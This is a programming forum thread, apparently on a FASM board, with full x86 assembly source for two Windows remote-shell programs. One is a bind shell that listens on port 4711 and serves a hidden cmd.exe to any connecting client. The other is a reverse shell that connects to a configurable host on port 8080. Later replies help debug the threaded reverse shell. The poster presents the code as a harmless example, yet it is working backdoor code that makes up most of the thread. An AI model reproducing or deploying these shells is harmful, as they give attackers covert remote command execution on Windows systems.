WaitForSingleObject() looks like better alternative to Sleep(). It changes behavior from "probably thread's done" to "it's done".

You're welcome.

Here is another simple winsock scipt i have on my HD.
It's a shell spawning win32 example written in fasm.

Program will load winsock, listen on a port, and spawn a cmd.exe shell when a connection is made.
Please do not consider this as a virus trojan or something like that.

Code:

    ;-------------------------------------------------------------------------------
    ; - ShellSpawner - Win32 Shell Spawning Example
    ; - Listens on port 4711
    ;-------------------------------------------------------------------------------
    ; - Program will load winsock, listen on a port,
    ;   and spawn a cmd.exe shell when a connection is made
    ;-------------------------------------------------------------------------------
    ; - 30 July 09, Picnic
    ;-------------------------------------------------------------------------------

    format PE CONSOLE

    include "include\win32ax.inc"

;-------------------------------------------------------------------------------

section ".data" data readable writeable

;-------------------------------------------------------------------------------

    IPPROTO_TCP = 6
    INADDR_ANY = 0
    INFINITE = -1
    PORT = 4711

    lpThreadId dd ?
    server dd ?
    saddrlen dd sizeof.sockaddr_in

    align 4
    WSAData WSADATA
    align 4
    lpStartupInfo STARTUPINFO
    align 4
    lpProcessInformation PROCESS_INFORMATION
    align 4
    saddr sockaddr_in

;-------------------------------------------------------------------------------

section ".text" code readable executable

;-------------------------------------------------------------------------------
entry $
    ; initialize the winsock library
    invoke WSAStartup, 0202h, addr WSAData
    test eax, eax
    jnz .exitA

    ; create a new socket
    invoke WSASocket, AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0
    cmp eax, -1
    jz .exitB

    mov dword [server], eax

    ; set address family
    mov word [saddr.sin_family], AF_INET
    ; convert port number to network byte and store it
    invoke htons, PORT
    mov word [saddr.sin_port], ax
    ; let winsock choose my address
    invoke htonl, INADDR_ANY
    mov dword [saddr.sin_addr], eax

    ; assign address to socket
    invoke bind, dword [server], addr saddr, sizeof.sockaddr_in
    test eax, eax
    jnz .exitC

    ; puts socket in listening state
    invoke listen, dword [server], 1
    test eax, eax
    jnz .exitC

    .while 1
       ; loop forever waiting client to arrive.
       ; when a connection is accepted a new socket is created on the server side
        invoke accept, dword [server], addr saddr, addr saddrlen
        cmp eax, -1
        jz .exitC

       ; start a new thread
       ; new socket handle is passed to the thread as parameter
        invoke CreateThread, 0, 0, Thread_ShellSpawner, eax, 0, addr lpThreadId
    .endw

.exitC:
    ; closes server socket
    invoke closesocket, dword [server]
.exitB:
    ; cleans up the winsock library
    invoke WSACleanup
.exitA:
    ; exit application
    invoke ExitProcess, 0
    ret

;-------------------------------------------------------------------------------

align 4
proc Thread_ShellSpawner,\
    client:dword

    local lpBuffer[MAX_PATH+1]:BYTE

    ; retrieves the path of the Windows system directory
    invoke GetSystemDirectory, addr lpBuffer, MAX_PATH
    ; and changes the current directory
    invoke SetCurrentDirectory, addr lpBuffer

    ; specify main window properties
    mov dword [lpStartupInfo.cb], sizeof.STARTUPINFO
    mov dword [lpStartupInfo.lpReserved], 0
    mov dword [lpStartupInfo.lpTitle], 0
    mov dword [lpStartupInfo.dwFlags], STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES
    mov word [lpStartupInfo.wShowWindow], SW_HIDE
    mov word [lpStartupInfo.cbReserved2], 0
    mov dword [lpStartupInfo.lpReserved2], 0
    mov eax, dword [client]
    mov dword [lpStartupInfo.hStdError], eax
    mov dword [lpStartupInfo.hStdInput], eax
    mov dword [lpStartupInfo.hStdOutput], eax

    ; finally, create shell
    invoke CreateProcess, 0, <"cmd.exe">, 0, 0, TRUE, 0, 0, 0, addr lpStartupInfo, addr lpProcessInformation

    ; call WaitForSingleObject with an infinite timeout
    invoke WaitForSingleObject, dword [lpProcessInformation.hProcess], INFINITE

    ; close client socket
    invoke closesocket, dword [client]
    ret
endp

;-------------------------------------------------------------------------------

section ".idata" import data readable writeable

;-------------------------------------------------------------------------------

    library kernel32,"KERNEL32.DLL",\
         ws2_32,"WS2_32.DLL"

    include "include\api\kernel32.inc"

    import ws2_32,\
       WSAStartup,"WSAStartup",\
       WSASocket,"WSASocketA",\
       htonl,"htonl",\
       bind,"bind",\
       htons,"htons",\
       listen,"listen",\
       accept,"accept",\
       closesocket,"closesocket",\
       WSACleanup,"WSACleanup"
    

include 'win32ax.inc'
entry main

IPPROTO_TCP = 6
PORT = 8080

    cmd     db "cmd.exe",0
    UrIP    db "localhost",0

    sinfo   STARTUPINFO
    pinfo   PROCESS_INFORMATION

    saddr sockaddr_in
    wsadata WSADATA
    sock dd ?
    lpThreadId dd ?


main:
     invoke WSAStartup, 0202h, wsadata

     test eax,eax
     jnz exit

     invoke WSASocketA, AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0
     cmp eax, -1
     jz exit

     mov [sock],eax
     mov [saddr.sin_family],AF_INET

     invoke htons,PORT
     mov [saddr.sin_port],ax

     invoke gethostbyname, UrIP

     mov eax, [eax+12]
     mov eax, [eax]
     mov eax, [eax]
     mov [saddr.sin_addr], eax
     mov eax,[sock]

    .while 1
     invoke connect, [sock],  saddr , sizeof.sockaddr_in
     invoke CreateThread, 0, 0, Thread_ShellSpawner, eax, 0, addr lpThreadId
    .endw


exit:invoke ExitProcess,0

proc Thread_ShellSpawner,client:dword

     mov dword [sinfo.cb],sizeof.STARTUPINFO
     mov dword [sinfo.dwFlags],STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES
     mov word [sinfo.wShowWindow], SW_HIDE

     mov word [sinfo.cbReserved2], 0
     mov dword [sinfo.lpReserved2], 0

     mov eax,[client]

     mov [sinfo.hStdInput],eax
     mov [sinfo.hStdOutput],eax
     mov [sinfo.hStdError],eax

     invoke CreateProcess, 0, <"cmd.exe">, 0, 0, TRUE, 0, 0, 0,addr sinfo,addr pinfo
     invoke WaitForSingleObject,dword[pinfo.hProcess],-1
     invoke closesocket, dword [client]
     ret
endp

    section '.idata' import data readable writeable
    library kernel32,'kernel32.dll',user32,'user32.dll',ws2_32,'ws2_32.dll'
    include "%include%/api/ws2_32.inc"
    include "%include%/api/kernel32.inc"
    include "%include%/api/user32.inc"
    

Hi jochenvnltn,

Take it one step at a time, see if you can make the program work without the thread part. Try a simple connect, try different UrIP values, check the return values from function. Use netcat to test the program.

Sorry if i wasn't of much help.

It works great without the thread part. My question is however why it does not work with the thread part ...

jochenvnltn wrote:

It works great without the thread part. My question is however why it does not work with the thread part ...

I haven't looked at your code closely but using global variables for thread procedures is a good way to have many problems. I'd suggest you make all data used within a thread to use local variables only. If it doesn't help with your problem then at least it will make things a lot easier later on.

sinfo is global and used within the thread, no? pinfo also, no?

BTW: Whenever you create a thread you should also close the thread handle (with CloseHandle) at some point, else you get handle and memory leakage problems. If you don't need the exit code then you can close the handle immediately and just let the thread do its things and close itself when done.

Note: Closing the handle does not close the thread so don't worry about it being prematurely terminated.